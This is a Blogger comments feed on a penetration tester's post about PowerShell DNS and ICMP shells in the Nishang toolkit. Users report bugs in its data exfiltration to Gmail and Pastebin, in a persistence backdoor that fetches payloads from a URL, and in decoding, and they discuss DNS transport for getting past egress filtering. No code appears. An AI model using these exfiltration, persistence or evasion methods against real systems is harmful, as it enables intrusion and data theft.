tag:blogger.com,1999:blog-8135211063584500909.post4810962300301465835..comments2023-10-02T15:18:02.659+05:30Comments on Lab of a Penetration Tester: Week of PowerShell Shells - Day 5 - DNS, ICMP Shells and Wrap upNikhil SamratAshok Mittalhttp://www.blogger.com/profile/02092541175521734123noreply@blogger.comBlogger7125tag:blogger.com,1999:blog-8135211063584500909.post-5337046117494946182015-07-03T17:16:54.721+05:302015-07-03T17:16:54.721+05:30Thank you for the quick response. Ive raised a iss...Thank you for the quick response. Ive raised a issue on your github about the Gmail Do-Exfiltration option. The persistence function and the problem with it not rechecking "CheckURL" do not give any errors. But the Hit count on the pastebin "CheckURL" page just gets raised by one, once after i run the command and once after reboot of the machine, regardless of magicstring stopstring or random data on the "CheckURL" page. This also shows in the lack of script/command execution of the "PayloadURL", which also dosnt get an higher hit count, even when the magicstring is there in "CheckURL". I tested the persistence function on a regular user, an elevated user account and system, all with the same result. I have no idea where it goes wrong or if its me using this the wrong way. The lack of errors made me not want to raise this issue on your github<br /><br />I really appreciate your great work with Nishang!Anonymousnoreply@blogger.comtag:blogger.com,1999:blog-8135211063584500909.post-35166521764008559122015-07-02T17:37:03.475+05:302015-07-02T17:37:03.475+05:30Thanks for reporting these. Since you are facing m...Thanks for reporting these. Since you are facing multiple issues, could you please raise issues at Nishang's Github repo? https://github.com/samratashok/nishang<br /><br /> Please make sure you the errors you are receiving. <br />Nikhil SamratAshok Mittalhttps://www.blogger.com/profile/02092541175521734123noreply@blogger.comtag:blogger.com,1999:blog-8135211063584500909.post-82056868128433847732015-07-02T16:45:37.437+05:302015-07-02T16:45:37.437+05:30I forgot to mention that the "CheckURL" ...I forgot to mention that the "CheckURL" problem is there regardless of if it finds the magicstring, stopstring or nothing at allAnonymousnoreply@blogger.comtag:blogger.com,1999:blog-8135211063584500909.post-20077215607006309552015-07-02T16:42:50.056+05:302015-07-02T16:42:50.056+05:30Awesome work! Im just having a couple of small iss...Awesome work! Im just having a couple of small issues with the scripts... The Invoke-Decode dosnt seem to work for me, it says something about the string/script not beeing correctly encoded, but i can decode the same string/script with an external base64 decoder. Another issue is when i exfiltrate data with the Do-Exfiltration, the gmail option throws an error, even though its correctly setup in the security settings of gmail. The pastebin option works but it only exfiltrates the first line of the output, Ive tested this with get-information and several other powerpreter functions. I also have problems with the persistence function of powerpreter. It seems like it only checks the "CheckURL" page of pastebin once when its run and once after reboot, not every 5 seconds. <br /><br />Thanks for your great work!Anonymousnoreply@blogger.comtag:blogger.com,1999:blog-8135211063584500909.post-72499631612934843892015-05-19T17:45:14.476+05:302015-05-19T17:45:14.476+05:30Can I hack a faicebuk with this?Can I hack a faicebuk with this?Anonymousnoreply@blogger.comtag:blogger.com,1999:blog-8135211063584500909.post-77834894174270256222015-05-17T11:00:26.418+05:302015-05-17T11:00:26.418+05:30Sure. When I wrote "While dnscat2 supports an...Sure. When I wrote "While dnscat2 supports an indirect connection as well", I meant that you can use an internal DNS/forwarders as well. That holds true both for the shell and DNS_TXT_Pwnage backdoor. I believe I have also mentioned the same in the video. Sorry if that was not clear at first. <br /><br />Hope it helps. Nikhil SamratAshok Mittalhttps://www.blogger.com/profile/02092541175521734123noreply@blogger.comtag:blogger.com,1999:blog-8135211063584500909.post-89260713614470604972015-05-17T02:15:51.403+05:302015-05-17T02:15:51.403+05:30Your DNS shell requires egress port 53 to be open ...Your DNS shell requires egress port 53 to be open to outside which is in an average enterprise usually *blocked* for all systems except DNS forwarders. The better option would be to use DNS-A or/and DNS-TXT requests/answers as a transport for evading egress rules. Could you comment on that please ? ThanksAnonymousnoreply@blogger.com